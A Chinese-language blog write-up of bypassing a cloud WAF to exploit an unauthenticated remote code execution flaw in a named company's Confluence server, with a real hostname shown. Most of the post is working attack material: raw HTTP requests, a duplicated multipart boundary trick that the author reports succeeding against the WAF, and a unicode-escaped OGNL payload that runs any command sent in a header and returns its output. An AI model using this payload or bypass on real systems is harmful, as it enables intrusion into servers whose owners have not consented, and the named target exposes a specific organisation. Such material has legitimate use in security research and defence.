【实战】一次基于HTTP协议的云WAF绕过记录

日常渗透发现的某企业存在Confluence未授权rce的漏洞，隔了一个周末后发现被waf拦截了，所以多了个和waf对抗的故事......

1、HTTP隧道传输/ HTTP pipeline【失败】

通过使用 Connection: keep-alive 达到一次传输多个http包的效果；

POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Content-Length: 203

queryString=aPOST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1
Host: help.hualala.com
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
cmd: pwd

queryString={

2、分块传输/ Chunked Transfer (HTTP 1.1)【失败】

插件：http://github.com/c0ny1/chunked-coding-converter

 

3、HTTP协议未覆盖【成功】

利用 Content-type: multipart/form-data绕过上传的边界（boundary）限制。

通过多boundary定义，使waf检测范围和实际上传范围不一致，从而绕过waf上传恶意内容：

POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=--------998091706;boundary=--------998091705
X-Requested-With: XMLHttpRequest
x-atlassian-mau-ignore: true
Content-Length: 678
Connection: close
Cookie: JSESSIONID=E4513E8589FBD6AB5128994E87ADA4D0
cmd: id

----------998091706
Content-Disposition: form-data; name="queryString"

sss
----------998091706--
----------998091705
Content-Disposition: form-data; name="queryString"

\u0027+#{\u0022\u0022[\u0022class\u0022].forName(\u0022javax.script.ScriptEngineManager\u0022).newInstance().getEngineByName(\u0022js\u0022).eval(\u0022var c=com.atlassian.core.filters.ServletContextThreadLocal.getRequest().getHeader(\u0027cmd\u0027);var x=java.lang.Runtime.getRuntime().exec(c);var out=com.atlassian.core.filters.ServletContextThreadLocal.getResponse().getOutputStream();org.apache.commons.io.IOUtils.copy(x.getInputStream(),out);out.flush();\u0022)}+\u0027
----------998091705--

 

高并发、垃圾数据都尝试了，均未成功，就不放截图了。